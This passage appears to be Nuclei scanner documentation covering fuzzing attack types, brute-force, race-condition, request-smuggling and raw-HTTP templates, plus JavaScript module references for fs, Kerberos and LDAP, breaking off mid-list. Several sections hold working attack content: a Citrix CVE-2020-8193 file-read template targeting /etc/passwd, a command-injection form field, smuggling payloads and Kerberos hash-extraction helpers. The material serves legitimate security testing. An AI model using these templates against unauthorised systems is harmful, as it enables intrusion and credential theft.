Nuclei engine supports multiple attack types, including `batteringram` as default type which generally used to fuzz single parameter, `clusterbomb` and `pitchfork` for fuzzing multiple parameters which works same as classical burp intruder.
| **Type** | batteringram | pitchfork | clusterbomb |
| ----------- | ------------ | --------- | ----------- |
| **Support** | ✔ | ✔ | ✔ |
### batteringram
The battering ram attack type places the same payload value in all positions. It uses only one payload set. It loops through the payload set and replaces all positions with the payload value.
### pitchfork
The pitchfork attack type uses one payload set for each position. It places the first payload in the first position, the second payload in the second position, and so on.
It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
### clusterbomb
The cluster bomb attack tries all different combinations of payloads. It still puts the first payload in the first position, and the second payload in the second position. But when it loops through the payload sets, it tries all combinations.
It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
This attack type is useful for a brute-force attack. Load a list of commonly used usernames in the first payload set, and a list of commonly used passwords in the second payload set. The cluster bomb attack will then try all combinations.
More details [here](https://www.sjoerdlangkemper.nl/2017/08/02/burp-intruder-attack-types/).
## Attack Mode Example
An example of the using `clusterbomb` attack to fuzz.
```yaml
http:
- raw:
- |
POST /?file={{path}} HTTP/1.1
User-Agent: {{header}}
Host: {{Hostname}}
attack: clusterbomb # Defining HTTP fuzz attack type
payloads:
path: helpers/wordlists/prams.txt
header: helpers/wordlists/header.txt
```
# HTTP Payloads Examples
Source: https://docs.projectdiscovery.io/templates/protocols/http/http-payloads-examples
Review some HTTP payload examples for Nuclei
## HTTP Intruder Bruteforcing
This template makes a defined POST request in RAW format along with in template defined payloads running `clusterbomb` intruder and checking for string match against response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
# HTTP Intruder bruteforcing with in template payload support.
http:
- raw:
- |
POST /?username=§username§¶mb=§password§ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
Host: {{Hostname}}
another_header: {{base64('§password§')}}
Accept: */*
body=test
payloads:
username:
- admin
password:
- admin
- guest
- password
- test
- 12345
- 123456
attack: clusterbomb # Available: batteringram,pitchfork,clusterbomb
matchers:
- type: word
words:
- "Test is test matcher text"
```
## BruteForcing multiple requests
This template makes a defined POST request in RAW format along with wordlist based payloads running `clusterbomb` intruder and checking for string match against response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
http:
- raw:
- |
POST /?param_a=§param_a§¶mb=§param_b§ HTTP/1.1
User-Agent: §param_a§
Host: {{Hostname}}
another_header: {{base64('§param_b§')}}
Accept: */*
admin=test
- |
DELETE / HTTP/1.1
User-Agent: nuclei
Host: {{Hostname}}
{{sha256('§param_a§')}}
- |
PUT / HTTP/1.1
Host: {{Hostname}}
{{html_escape('§param_a§')}} + {{hex_encode('§param_b§'))}}
attack: clusterbomb # Available types: batteringram,pitchfork,clusterbomb
payloads:
param_a: payloads/prams.txt
param_b: payloads/paths.txt
matchers:
- type: word
words:
- "Test is test matcher text"
```
## Authenticated Bruteforcing
This template makes a subsequent HTTP requests with defined requests maintaining sessions between each request and checking for string match against response.
```yaml
id: multiple-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /testing HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
testing=parameter
cookie-reuse: true # Cookie-reuse maintain the session between all request like browser.
matchers:
- type: word
words:
- "Test is test matcher text"
```
# Race Conditions
Source: https://docs.projectdiscovery.io/templates/protocols/http/race-conditions
Learn about using race conditions with Nuclei
Race Conditions are another class of bugs not easily automated via traditional tooling. Burp Suite introduced a Gate mechanism to Turbo Intruder where all the bytes for all the requests are sent expect the last one at once which is only sent together for all requests synchronizing the send event.
We have implemented **Gate** mechanism in nuclei engine and allow them run via templates which makes the testing for this specific bug class simple and portable.
To enable race condition check within template, `race` attribute can be set to `true` and `race_count` defines the number of simultaneous request you want to initiate.
Below is an example template where the same request is repeated for 10 times using the gate logic.
```yaml
id: race-condition-testing
info:
name: Race condition testing
author: pdteam
severity: info
http:
- raw:
- |
POST /coupons HTTP/1.1
Host: {{Hostname}}
promo_code=20OFF
race: true
race_count: 10
matchers:
- type: status
part: header
status:
- 200
```
You can simply replace the `POST` request with any suspected vulnerable request and change the `race_count` as per your need, and it's ready to run.
```bash
nuclei -t race.yaml -target https://api.target.com
```
**Multi request race condition testing**
For the scenario when multiple requests needs to be sent in order to exploit the race condition, we can make use of threads.
```yaml
threads: 5
race: true
```
`threads` is a total number of request you wanted make with the template to perform race condition testing.
Below is an example template where multiple (5) unique request will be sent at the same time using the gate logic.
```yaml
id: multi-request-race
info:
name: Race condition testing with multiple requests
author: pd-team
severity: info
http:
- raw:
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=1
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=2
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=3
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=4
- |
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
id=5
threads: 5
race: true
```
More complete examples are provided [here](/templates/protocols/http/http-race-condition-examples)
# Raw HTTP Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/http/raw-http
Learn about using Raw HTTP with Nuclei
Another way to create request is using raw requests which comes with more flexibility and support of DSL helper functions, like the following ones (as of now it's suggested to leave the `Host` header as in the example with the variable `{{Hostname}}`), All the Matcher, Extractor capabilities can be used with RAW requests in same the way described above.
```yaml
http:
- raw:
- |
POST /path2/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
a=test&b=pd
```
Requests can be fine-tuned to perform the exact tasks as desired. Nuclei requests are fully configurable meaning you can configure and define each and every single thing about the requests that will be sent to the target servers.
RAW request format also supports [various helper functions](/templates/reference/helper-functions/) letting us do run time manipulation with input. An example of the using a helper function in the header.
```yaml
- raw:
- |
GET /manager/html HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('username:password')}} # Helper function to encode input at run time.
```
To make a request to the URL specified as input without any additional tampering, a blank Request URI can be used as specified below which will make the request to user specified input.
```yaml
- raw:
- |
GET HTTP/1.1
Host: {{Hostname}}
```
More complete examples are provided [here](/templates/protocols/http/raw-http-examples)
# Request Tampering
Source: https://docs.projectdiscovery.io/templates/protocols/http/request-tampering
Learn about request tampering in HTTP with Nuclei
## Requests Annotation
Request inline annotations allow performing per request properties/behavior override. They are very similar to python/java class annotations and must be put on the request just before the RFC line. Currently, only the following overrides are supported:
* `@Host:` which overrides the real target of the request (usually the host/ip provided as input). It supports syntax with ip/domain, port, and scheme, for example: `domain.tld`, `domain.tld:port`, `http://domain.tld:port`
* `@tls-sni:` which overrides the SNI Name of the TLS request (usually the hostname provided as input). It supports any literals. The special value `request.host` uses the `Host` header and `interactsh-url` uses an interactsh generated URL.
* `@timeout:` which overrides the timeout for the request to a custom duration. It supports durations formatted as string. If no duration is specified, the default Timeout flag value is used.
The following example shows the annotations within a request:
```yaml
- |
@Host: https://projectdiscovery.io:443
POST / HTTP/1.1
Pragma: no-cache
Host: {{Hostname}}
Cache-Control: no-cache, no-transform
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
```
This is particularly useful, for example, in the case of templates with multiple requests, where one request after the initial one needs to be performed to a specific host (for example, to check an API validity):
```yaml
http:
- raw:
# this request will be sent to {{Hostname}} to get the token
- |
GET /getkey HTTP/1.1
Host: {{Hostname}}
# This request will be sent instead to https://api.target.com:443 to verify the token validity
- |
@Host: https://api.target.com:443
GET /api/key={{token}} HTTP/1.1
Host: api.target.com:443
extractors:
- type: regex
name: token
part: body
regex:
# random extractor of strings between prefix and suffix
- 'prefix(.*)suffix'
matchers:
- type: word
part: body
words:
- valid token
```
Example of a custom `timeout` annotations -
```yaml
- |
@timeout: 25s
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
```
Example of `sni` annotation with `interactsh-url` -
```yaml
- |
@tls-sni: interactsh-url
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
```
## Smuggling
HTTP Smuggling is a class of Web-Attacks recently made popular by [Portswigger’s Research](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) into the topic. For an in-depth overview, please visit the article linked above.
In the open source space, detecting http smuggling is difficult particularly due to the requests for detection being malformed by nature. Nuclei is able to reliably detect HTTP Smuggling vulnerabilities utilising the [rawhttp](https://github.com/projectdiscovery/rawhttp) engine.
The most basic example of an HTTP Smuggling vulnerability is CL.TE Smuggling. An example template to detect a CE.TL HTTP Smuggling vulnerability is provided below using the `unsafe: true` attribute for rawhttp based requests.
```yaml
id: CL-TE-http-smuggling
info:
name: HTTP request smuggling, basic CL.TE vulnerability
author: pdteam
severity: info
reference: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
unsafe: true
matchers:
- type: word
words:
- 'Unrecognized method GPOST'
```
More complete examples are provided [here](/templates/protocols/http/http-smuggling-examples)
# Unsafe HTTP
Source: https://docs.projectdiscovery.io/templates/protocols/http/unsafe-http
Learn about using rawhttp or unsafe HTTP with Nuclei
Nuclei supports [rawhttp](https://github.com/projectdiscovery/rawhttp) for complete request control and customization allowing **any kind of malformed requests** for issues like HTTP request smuggling, Host header injection, CRLF with malformed characters and more.
**rawhttp** library is disabled by default and can be enabled by including `unsafe: true` in the request block.
Here is an example of HTTP request smuggling detection template using `rawhttp`.
```yaml
http:
- raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked
0
GET /post?postId=5 HTTP/1.1
User-Agent: a"/>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1
- |+
GET /post?postId=5 HTTP/1.1
Host: {{Hostname}}
unsafe: true # Enables rawhttp client
matchers:
- type: dsl
dsl:
- 'contains(body, "")'
```
# Value Sharing
Source: https://docs.projectdiscovery.io/templates/protocols/http/value-sharing
Learn about sharing values between HTTP requests in the HTTP template.
## HTTP Value Sharing
In Nuclei, It is possible to extract value from one HTTP request and share/reuse it in another HTTP request. This has various use-cases like login, CSRF tokens and other complex.
This concept of value sharing is possible using [Dynamic Extractors](/templates/reference/extractors#dynamic-extractor). Here's a simple example demonstrating value sharing between HTTP requests.
This template makes a subsequent HTTP requests maintaining sessions between each request, dynamically extracting data from one request and reusing them into another request using variable name and checking for string match against response.
```yaml
id: CVE-2020-8193
info:
name: Citrix unauthenticated LFI
author: pdteam
severity: high
reference: https://github.com/jas502n/CVE-2020-8193
http:
- raw:
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/xml
X-NITRO-USER: xpyZxwy6
X-NITRO-PASS: xWXHUJ56
- |
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/neo HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/stc HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
rand_key: §randkey§
- |
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
rand_key: §randkey§
cookie-reuse: true # Using cookie-reuse to maintain session between each request, same as browser.
extractors:
- type: regex
name: randkey # Variable name
part: body
internal: true
regex:
- "(?m)[0-9]{3,10}\\.[0-9]+"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
```
# JavaScript Protocol Introduction
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/introduction
Learn more about using JavaScript with Nuclei v3
## Introduction
Nuclei and the ProjectDiscovery community thrive on the ability to write exploits/checks in a fast and simple YAML format. We work consistently to improve our **Nuclei templates** to encourage those as the standard for writing security checks. We understand the limitations and are always working to address those, while we work on expanding our capabilities.
Nuclei currently supports writing templates for complex HTTP, DNS, SSL protocol exploits/checks through a powerful and easy to use DSL in the Nuclei engine. However, we understand the current support may not be enough for addressing vulnerabilities across all protocols and in non-remote domains of security like local privilege escalation checks, kernel etc.
To address this, Nuclei v3 includes an embedded runtime for JavaScript that is tailored for **Nuclei** with the help of **[Goja](https://github.com/dop251/goja)**.
## Features
**Support for provider or driver-specific exploits**
Some vulnerabilities are specific to software or a driver. For example, a Redis buffer overflow exploit, an exploit of specific VPN software, or exploits that are not part of the Internet Engineering Task Force (IETF) standard protocols.
Since these are not standard protocols they are not typically added to Nuclei. Detection for these types of exploits cannot be written using a 'network' protocol.
They are often very complex to write and detection for these exploits can be written by exposing the required library in Nuclei (if not already present). We now provide support for writing detection of these types of exploits with JavaScript.
**Non-network checks**
Security is not limited to network exploits. Nuclei provides support for security beyond network issues like:
* Local privilege escalation checks
* Kernel exploits
* Account misconfigurations
* System misconfigurations
**Complex network protocol exploits**
Some network exploits are very complex to write due to nature of the protocol or exploit itself. For example [CVE-2020-0796](https://nvd.nist.gov/vuln/detail/cve-2020-0796) requires you to manually construct a packet.
Detection for these exploits is usually written in Python but now can be written in JavaScript.
**Multi-step exploits**
LDAP or Kerberos exploits usually involve a multi-step process of authentication and are difficult to write in YAML-based DSL. JavaScript support makes this easier.
**Scalable and maintainable exploits**
One off exploit detection written in code are not scalable and maintainable due to nature of language, boilerplate code, and other factors. Our goal is to provide the tools to allow you to write the **minimum** code required to run detection of the exploit and let Nuclei do the rest.
**Leveraging Turing complete language**
While YAML-based DSL is powerful and easy to use it is not Turing complete and has its own limitations. Javascript is Turing complete thus users who are already familiar with JavaScript can write network and other detection of exploits without learning new DSL or hacking around existing DSL.
## Requirements
* A basic knowledge of JavaScript (loops, functions, arrays) is required to write a JavaScript protocol template
* Nuclei v3.0.0 or above
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/bytes
# Namespace: bytes
## Table of contents
### Classes
* [Buffer](/templates/protocols/javascript/modules/bytes.Buffer)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/fs
# Namespace: fs
## Table of contents
### Functions
* [ListDir](/templates/protocols/javascript/modules/fs#listdir)
* [ReadFile](/templates/protocols/javascript/modules/fs#readfile)
* [ReadFileAsString](/templates/protocols/javascript/modules/fs#readfileasstring)
* [ReadFilesFromDir](/templates/protocols/javascript/modules/fs#readfilesfromdir)
## Functions
### ListDir
▸ **ListDir**(`path`, `itemType`): `string`\[] | `null`
ListDir lists itemType values within a directory
depending on the itemType provided
itemType can be any one of \['file','dir',”]
#### Parameters
| Name | Type |
| :--------- | :------- |
| `path` | `string` |
| `itemType` | `string` |
#### Returns
`string`\[] | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// this will only return files in /tmp directory
const files = fs.ListDir('/tmp', 'file');
```
**`Example`**
```javascript
const fs = require('nuclei/fs');
// this will only return directories in /tmp directory
const dirs = fs.ListDir('/tmp', 'dir');
```
**`Example`**
```javascript
const fs = require('nuclei/fs');
// when no itemType is provided, it will return both files and directories
const items = fs.ListDir('/tmp');
```
#### Defined in
fs.ts:26
***
### ReadFile
▸ **ReadFile**(`path`): `Uint8Array` | `null`
ReadFile reads file contents within permitted paths
and returns content as byte array
#### Parameters
| Name | Type |
| :----- | :------- |
| `path` | `string` |
#### Returns
`Uint8Array` | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const content = fs.ReadFile('helpers/usernames.txt');
```
#### Defined in
fs.ts:42
***
### ReadFileAsString
▸ **ReadFileAsString**(`path`): `string` | `null`
ReadFileAsString reads file contents within permitted paths
and returns content as string
#### Parameters
| Name | Type |
| :----- | :------- |
| `path` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const content = fs.ReadFileAsString('helpers/usernames.txt');
```
#### Defined in
fs.ts:58
***
### ReadFilesFromDir
▸ **ReadFilesFromDir**(`dir`): `string`\[] | `null`
ReadFilesFromDir reads all files from a directory
and returns a string array with file contents of all files
#### Parameters
| Name | Type |
| :---- | :------- |
| `dir` | `string` |
#### Returns
`string`\[] | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const contents = fs.ReadFilesFromDir('helpers/ssh-keys');
log(contents);
```
#### Defined in
fs.ts:75
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ikev2
# Namespace: ikev2
## Table of contents
### Classes
* [IKEMessage](/templates/protocols/javascript/modules/ikev2.IKEMessage)
### Interfaces
* [IKENonce](/templates/protocols/javascript/modules/ikev2.IKENonce)
* [IKENotification](/templates/protocols/javascript/modules/ikev2.IKENotification)
### Variables
* [IKE\_EXCHANGE\_AUTH](/templates/protocols/javascript/modules/ikev2#ike_exchange_auth)
* [IKE\_EXCHANGE\_CREATE\_CHILD\_SA](/templates/protocols/javascript/modules/ikev2#ike_exchange_create_child_sa)
* [IKE\_EXCHANGE\_INFORMATIONAL](/templates/protocols/javascript/modules/ikev2#ike_exchange_informational)
* [IKE\_EXCHANGE\_SA\_INIT](/templates/protocols/javascript/modules/ikev2#ike_exchange_sa_init)
* [IKE\_FLAGS\_InitiatorBitCheck](/templates/protocols/javascript/modules/ikev2#ike_flags_initiatorbitcheck)
* [IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN](/templates/protocols/javascript/modules/ikev2#ike_notify_no_proposal_chosen)
* [IKE\_NOTIFY\_USE\_TRANSPORT\_MODE](/templates/protocols/javascript/modules/ikev2#ike_notify_use_transport_mode)
* [IKE\_VERSION\_2](/templates/protocols/javascript/modules/ikev2#ike_version_2)
## Variables
### IKE\_EXCHANGE\_AUTH
• `Const` **IKE\_EXCHANGE\_AUTH**: `35`
#### Defined in
ikev2.ts:4
***
### IKE\_EXCHANGE\_CREATE\_CHILD\_SA
• `Const` **IKE\_EXCHANGE\_CREATE\_CHILD\_SA**: `36`
#### Defined in
ikev2.ts:7
***
### IKE\_EXCHANGE\_INFORMATIONAL
• `Const` **IKE\_EXCHANGE\_INFORMATIONAL**: `37`
#### Defined in
ikev2.ts:10
***
### IKE\_EXCHANGE\_SA\_INIT
• `Const` **IKE\_EXCHANGE\_SA\_INIT**: `34`
#### Defined in
ikev2.ts:13
***
### IKE\_FLAGS\_InitiatorBitCheck
• `Const` **IKE\_FLAGS\_InitiatorBitCheck**: `8`
#### Defined in
ikev2.ts:16
***
### IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN
• `Const` **IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN**: `14`
#### Defined in
ikev2.ts:19
***
### IKE\_NOTIFY\_USE\_TRANSPORT\_MODE
• `Const` **IKE\_NOTIFY\_USE\_TRANSPORT\_MODE**: `16391`
#### Defined in
ikev2.ts:22
***
### IKE\_VERSION\_2
• `Const` **IKE\_VERSION\_2**: `32`
#### Defined in
ikev2.ts:25
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/kerberos
# Namespace: kerberos
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/kerberos.Client)
* [Config](/templates/protocols/javascript/modules/kerberos.Config)
### Interfaces
* [AuthorizationDataEntry](/templates/protocols/javascript/modules/kerberos.AuthorizationDataEntry)
* [BitString](/templates/protocols/javascript/modules/kerberos.BitString)
* [EncTicketPart](/templates/protocols/javascript/modules/kerberos.EncTicketPart)
* [EncryptedData](/templates/protocols/javascript/modules/kerberos.EncryptedData)
* [EncryptionKey](/templates/protocols/javascript/modules/kerberos.EncryptionKey)
* [EnumerateUserResponse](/templates/protocols/javascript/modules/kerberos.EnumerateUserResponse)
* [HostAddress](/templates/protocols/javascript/modules/kerberos.HostAddress)
* [LibDefaults](/templates/protocols/javascript/modules/kerberos.LibDefaults)
* [PrincipalName](/templates/protocols/javascript/modules/kerberos.PrincipalName)
* [Realm](/templates/protocols/javascript/modules/kerberos.Realm)
* [TGS](/templates/protocols/javascript/modules/kerberos.TGS)
* [Ticket](/templates/protocols/javascript/modules/kerberos.Ticket)
* [TransitedEncoding](/templates/protocols/javascript/modules/kerberos.TransitedEncoding)
### Functions
* [ASRepToHashcat](/templates/protocols/javascript/modules/kerberos#asreptohashcat)
* [CheckKrbError](/templates/protocols/javascript/modules/kerberos#checkkrberror)
* [NewKerberosClientFromString](/templates/protocols/javascript/modules/kerberos#newkerberosclientfromstring)
* [SendToKDC](/templates/protocols/javascript/modules/kerberos#sendtokdc)
* [TGStoHashcat](/templates/protocols/javascript/modules/kerberos#tgstohashcat)
## Functions
### ASRepToHashcat
▸ **ASRepToHashcat**(`asrep`): `string` | `null`
ASRepToHashcat converts an AS-REP message to a hashcat format
#### Parameters
| Name | Type |
| :------ | :---- |
| `asrep` | `any` |
#### Returns
`string` | `null`
#### Defined in
kerberos.ts:6
***
### CheckKrbError
▸ **CheckKrbError**(`b`): `Uint8Array` | `null`
CheckKrbError checks if the response bytes from the KDC are a KRBError.
#### Parameters
| Name | Type |
| :--- | :----------- |
| `b` | `Uint8Array` |
#### Returns
`Uint8Array` | `null`
#### Defined in
kerberos.ts:15
***
### NewKerberosClientFromString
▸ **NewKerberosClientFromString**(`cfg`): [`Client`](/templates/protocols/javascript/modules/kerberos.Client) | `null`
NewKerberosClientFromString creates a new kerberos client from a string
by parsing krb5.conf
#### Parameters
| Name | Type |
| :---- | :------- |
| `cfg` | `string` |
#### Returns
[`Client`](/templates/protocols/javascript/modules/kerberos.Client) | `null`
**`Example`**
```javascript
const kerberos = require('nuclei/kerberos');
const client = kerberos.NewKerberosClientFromString(`
[libdefaults]
default_realm = ACME.COM
dns_lookup_kdc = true
`);
```
#### Defined in
kerberos.ts:34
***
### SendToKDC
▸ **SendToKDC**(`kclient`, `msg`): `string` | `null`
sendtokdc.go deals with actual sending and receiving responses from KDC
SendToKDC sends a message to the KDC and returns the response.
It first tries to send the message over TCP, and if that fails, it falls back to UDP.(and vice versa)
#### Parameters
| Name | Type |
| :-------- | :------------------------------------------------------------------ |
| `kclient` | [`Client`](/templates/protocols/javascript/modules/kerberos.Client) |
| `msg` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const kerberos = require('nuclei/kerberos');
const client = new kerberos.Client('acme.com');
const response = kerberos.SendToKDC(client, 'message');
```
#### Defined in
kerberos.ts:51
***
### TGStoHashcat
▸ **TGStoHashcat**(`tgs`, `username`): `string` | `null`
TGStoHashcat converts a TGS to a hashcat format.
#### Parameters
| Name | Type |
| :--------- | :------- |
| `tgs` | `any` |
| `username` | `string` |
#### Returns
`string` | `null`
#### Defined in
kerberos.ts:60
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap
# Namespace: ldap
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/ldap.Client)
### Interfaces
* [Config](/templates/protocols/javascript/modules/ldap.Config)
* [LdapAttributes](/templates/protocols/javascript/modules/ldap.LdapAttributes)
* [LdapEntry](/templates/protocols/javascript/modules/ldap.LdapEntry)
* [Metadata](/templates/protocols/javascript/modules/ldap.Metadata)
* [SearchResult](/templates/protocols/javascript/modules/ldap.SearchResult)
### Variables
* [FilterAccountDisabled](/templates/protocols/javascript/modules/ldap#filteraccountdisabled)
* [FilterAccountEnabled](/templates/protocols/javascript/modules/ldap#filteraccountenabled)
* [FilterCanSendEncryptedPassword](/templates/protocols/javascript/modules/ldap#filtercansendencryptedpassword)
* [FilterDontExpirePassword](/templates/protocols/javascript/modules/ldap#filterdontexpirepassword)
* [FilterDontRequirePreauth](/templates/protocols/javascript/modules/ldap#filterdontrequirepreauth)
* [FilterHasServicePrincipalName](/templates/protocols/javascript/modules/ldap#filterhasserviceprincipalname)
* [FilterHomedirRequired](/templates/protocols/javascript/modules/ldap#filterhomedirrequired)
* [FilterInterdomainTrustAccount](/templates/protocols/javascript/modules/ldap#filterinterdomaintrustaccount)
* [FilterIsAdmin](/templates/protocols/javascript/modules/ldap#filterisadmin)
* [FilterIsComputer](/templates/protocols/javascript/modules/ldap#filteriscomputer)
* [FilterIsDuplicateAccount](/templates/protocols/javascript/modules/ldap#filterisduplicateaccount)
* [FilterIsGroup](/templates/protocols/javascript/modules/ldap#filterisgroup)
* [FilterIsNormalAccount](/templates/protocols/javascript/modules/ldap#filterisnormalaccount)
* [FilterIsPerson](/templates/protocols/javascript/modules/ldap#filterisperson)
* [FilterLockout](/templates/protocols/javascript/modules/ldap#filterlockout)
* [FilterLogonScript](/templates/protocols/javascript/modules/ldap#filterlogonscript)
* [FilterMnsLogonAccount](/templates/protocols/javascript/modules/ldap#filtermnslogonaccount)
* [FilterNotDelegated](/templates/protocols/javascript/modules/ldap#filternotdelegated)
* [FilterPartialSecretsAccount](/templates/protocols/javascript/modules/ldap#filterpartialsecretsaccount)
* [FilterPasswordCantChange](/templates/protocols/javascript/modules/ldap#filterpasswordcantchange)
* [FilterPasswordExpired](/templates/protocols/javascript/modules/ldap#filterpasswordexpired)
* [FilterPasswordNotRequired](/templates/protocols/javascript/modules/ldap#filterpasswordnotrequired)
* [FilterServerTrustAccount](/templates/protocols/javascript/modules/ldap#filterservertrustaccount)
* [FilterSmartCardRequired](/templates/protocols/javascript/modules/ldap#filtersmartcardrequired)
* [FilterTrustedForDelegation](/templates/protocols/javascript/modules/ldap#filtertrustedfordelegation)
* [FilterTrustedToAuthForDelegation](/templates/protocols/javascript/modules/ldap#filtertrustedtoauthfordelegation)
* [FilterUseDesKeyOnly](/templates/protocols/javascript/modules/ldap#filterusedeskeyonly)
* [FilterWorkstationTrustAccount](/templates/protocols/javascript/modules/ldap#filterworkstationtrustaccount)
### Functions
* [DecodeADTimestamp](/templates/protocols/javascript/modules/ldap#decodeadtimestamp)
* [DecodeSID](/templates/protocols/javascript/modules/ldap#decodesid)
* [DecodeZuluTimestamp](/templates/protocols/javascript/modules/ldap#decodezulutimestamp)
* [JoinFilters](/templates/protocols/javascript/modules/ldap#joinfilters)
* [NegativeFilter](/templates/protocols/javascript/modules/ldap#negativefilter)
## Variables
### FilterAccountDisabled
• `Const` **FilterAccountDisabled**: `"(userAccountControl:1.2.840.113556.1.4.803:=2)"`
The user account is disabled.
#### Defined in
ldap.ts:4
***
### FilterAccountEnabled
• `Const` **FilterAccountEnabled**: `"(!(userAccountControl:1.2.840.113556.1.4.803:=2))"`
The user account is enabled.
#### Defined in
ldap.ts:7
***
### FilterCanSendEncryptedPassword
• `Const` **FilterCanSendEncryptedPassword**: `"(userAccountControl:1.2.840.113556.1.4.803:=128)"`
The user can send an encrypted password.
#### Defined in
ldap.ts:10
***
### FilterDontExpirePassword
• `Const` **FilterDontExpirePassword**: `"(userAccountControl:1.2.840.113556.1.4.803:=65536)"`
Represents the password, which should never expire on the account.
#### Defined in
ldap.ts:13
***
### FilterDontRequirePreauth
• `Const` **FilterDontRequirePreauth**: `"(userAccountControl:1.2.840.113556.1.4.803:=4194304)"`
This account doesn't require Kerberos pre-authentication for logging on.
#### Defined in
ldap.ts:16
***
### FilterHasServicePrincipalName
• `Const` **FilterHasServicePrincipalName**: `"(servicePrincipalName=*)"`
The object has a service principal name.
#### Defined in
ldap.ts:19
***
### FilterHomedirRequired
• `Const` **FilterHomedirRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=8)"`
The home folder is required.
#### Defined in
ldap.ts:22
***
### FilterInterdomainTrustAccount
• `Const` **FilterInterdomainTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=2048)"`
It's a permit to trust an account for a system domain that trusts other domains.
#### Defined in
ldap.ts:25
***
### FilterIsAdmin
